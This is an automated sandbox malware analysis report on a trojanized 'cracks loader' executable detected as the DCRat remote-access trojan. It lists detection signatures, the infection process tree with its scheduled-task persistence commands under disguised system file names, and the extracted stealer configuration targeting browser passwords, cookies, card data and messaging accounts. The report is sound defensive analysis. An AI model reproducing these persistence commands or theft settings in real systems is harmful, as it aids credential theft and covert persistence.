Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NewLoaderCracks_1.32.exe

Overview

General Information

Sample name:NewLoaderCracks_1.32.exe
Analysis ID:1525863
MD5:957e3773e9346cee687c19fce88b7f4a
SHA1:86e0dbdf89012c5e2fee9feb0867ce867e8d5a1a
SHA256:2928f73f9fa919f37465f87f2cec1098c255bb420bc38d245aeb136c6e7f1271
Tags:exeuser-aachum
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NewLoaderCracks_1.32.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\NewLoaderCracks_1.32.exe" MD5: 957E3773E9346CEE687C19FCE88B7F4A)
    • wscript.exe (PID: 6496 cmdline: "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\comcontainer\xNFGfK2ypxJsgsGsm5kX9.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • SurrogateRef.exe (PID: 3472 cmdline: "C:\comcontainer\SurrogateRef.exe" MD5: A730EA6D448D235275000CF8ADA09A96)
          • schtasks.exe (PID: 5076 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5580 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5644 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2096 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2328 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4040 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2996 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Recovery\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5128 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5580 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2192 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7132 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6856 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6892 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2328 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7132 cmdline: schtasks.exe /create /tn "SurrogateRefS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6856 cmdline: schtasks.exe /create /tn "SurrogateRef" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5772 cmdline: schtasks.exe /create /tn "SurrogateRefS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows mail\SurrogateRef.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7008 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2168 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5272 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\CbsTemp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1600 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 14 /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5772 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQ" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2168 cmdline: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • SwpTnCnrsAAKjgTAQ.exe (PID: 6728 cmdline: "C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe" MD5: A730EA6D448D235275000CF8ADA09A96)
  • SwpTnCnrsAAKjgTAQ.exe (PID: 6992 cmdline: "C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe" MD5: A730EA6D448D235275000CF8ADA09A96)
  • cleanup
{"SCRT": "{\"o\":\"~\",\"9\":\"%\",\"v\":\"_\",\"c\":\"#\",\"R\":\"<\",\"j\":\"*\",\"d\":\")\",\"O\":\"^\",\"e\":\".\",\"i\":\"|\",\"J\":\"&\",\"L\":\" \",\"Y\":\"@\",\"m\":\"`\",\"y\":\"$\",\"0\":\"!\",\"V\":\">\",\"E\":\"-\",\"z\":\";\",\"w\":\"(\",\"C\":\",\"}", "PCRT": "{\"l\":\",\",\"Q\":\"<\",\"W\":\"~\",\"R\":\"%\",\"x\":\"$\",\"k\":\"^\",\"V\":\"`\",\"O\":\"!\",\"F\":\")\",\"B\":\"_\",\"9\":\" \",\"U\":\"@\",\"w\":\"*\",\"T\":\">\",\"2\":\"#\",\"e\":\"-\",\"S\":\"|\",\"b\":\"&\",\"n\":\";\",\"Z\":\"(\",\"m\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-G9r8ggR6vHi8ykWN8dgB", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": false, "AD": false}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2465802434.0000000002937000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    0000000E.00000002.2486586475.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000011.00000002.2486585028.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000005.00000002.2472557377.000000001239D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 3 entries

            System Summary

            barindex
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\comcontainer\SurrogateRef.exe, ProcessId: 3472, TargetFilename: C:\Recovery\csrss.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /f, CommandLine: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\comcontainer\SurrogateRef.exe" , ParentImage: C:\comcontainer\SurrogateRef.exe, ParentProcessId: 3472, ParentProcessName: SurrogateRef.exe, ProcessCommandLine: schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exe'" /f, ProcessId: 6856, ProcessName: schtasks.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NewLoaderCracks_1.32.exe", ParentImage: C:\Users\user\Desktop\NewLoaderCracks_1.32.exe, ParentProcessId: 2132, ParentProcessName: NewLoaderCracks_1.32.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe" , ProcessId: 6496, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\comcontainer\SurrogateRef.exe" , ParentImage: C:\comcontainer\SurrogateRef.exe, ParentProcessId: 3472, ParentProcessName: SurrogateRef.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, ProcessId: 2096, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T15:43:08.930952+020028033053Unknown Traffic192.168.2.649780208.95.112.180TCP
            2024-10-04T15:43:12.399719+020028033053Unknown Traffic192.168.2.649803208.95.112.180TCP
            2024-10-04T15:43:16.421787+020028033053Unknown Traffic192.168.2.649828208.95.112.180TCP
            2024-10-04T15:43:19.712146+020028033053Unknown Traffic192.168.2.649852208.95.112.180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: NewLoaderCracks_1.32.exeAvira: detected
            Source: C:\comcontainer\cmd.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\comcontainer\Kr8tZ.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files (x86)\Windows Mail\SurrogateRef.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\comcontainer\SurrogateRef.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files\Windows NT\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000005.00000002.2472557377.000000001239D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"o\":\"~\",\"9\":\"%\",\"v\":\"_\",\"c\":\"#\",\"R\":\"<\",\"j\":\"*\",\"d\":\")\",\"O\":\"^\",\"e\":\".\",\"i\":\"|\",\"J\":\"&\",\"L\":\" \",\"Y\":\"@\",\"m\":\"`\",\"y\":\"$\",\"0\":\"!\",\"V\":\">\",\"E\":\"-\",\"z\":\";\",\"w\":\"(\",\"C\":\",\"}", "PCRT": "{\"l\":\",\",\"Q\":\"<\",\"W\":\"~\",\"R\":\"%\",\"x\":\"$\",\"k\":\"^\",\"V\":\"`\",\"O\":\"!\",\"F\":\")\",\"B\":\"_\",\"9\":\" \",\"U\":\"@\",\"w\":\"*\",\"T\":\">\",\"2\":\"#\",\"e\":\"-\",\"S\":\"|\",\"b\":\"&\",\"n\":\";\",\"Z\":\"(\",\"m\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-G9r8ggR6vHi8ykWN8dgB", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": false, "AD": false}
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Reference Assemblies\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows Mail\SurrogateRef.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Windows NT\Idle.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\WmiPrvSE.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\csrss.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\Windows\CbsTemp\RuntimeBroker.exeReversingLabs: Detection: 87%
            Source: C:\comcontainer\SurrogateRef.exeReversingLabs: Detection: 87%
            Source: C:\comcontainer\SwpTnCnrsAAKjgTAQ.exeReversingLabs: Detection: 87%
            Source: C:\comcontainer\cmd.exeReversingLabs: Detection: 87%
            Source: NewLoaderCracks_1.32.exeReversingLabs: Detection: 68%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\comcontainer\cmd.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Mail\SurrogateRef.exeJoe Sandbox ML: detected
            Source: C:\comcontainer\SurrogateRef.exeJoe Sandbox ML: detected
            Source: C:\Recovery\WmiPrvSE.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Windows NT\Idle.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Recovery\csrss.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJoe Sandbox ML: detected
            Source: NewLoaderCracks_1.32.exeJoe Sandbox ML: detected
            Source: NewLoaderCracks_1.32.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exeJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\WindowsPowerShell\b85529a8a0a78eJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\Windows NT\Idle.exeJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\Windows NT\6ccacd8608530fJump to behavior
            Source: NewLoaderCracks_1.32.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NewLoaderCracks_1.32.exe
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0054A5F4
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0055B8E0
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056AAA8 FindFirstFileExA,0_2_0056AAA8
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: unknownDNS query: name: ip-api.com
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49803 -> 208.95.112.1:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49828 -> 208.95.112.1:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49852 -> 208.95.112.1:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49780 -> 208.95.112.1:80
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: SurrogateRef.exe, 00000005.00000002.2465802434.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: SurrogateRef.exe, 00000005.00000002.2465802434.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0054718C
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Windows\CbsTemp\RuntimeBroker.exeJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Windows\CbsTemp\9e8d7a4ca61bd9Jump to behavior
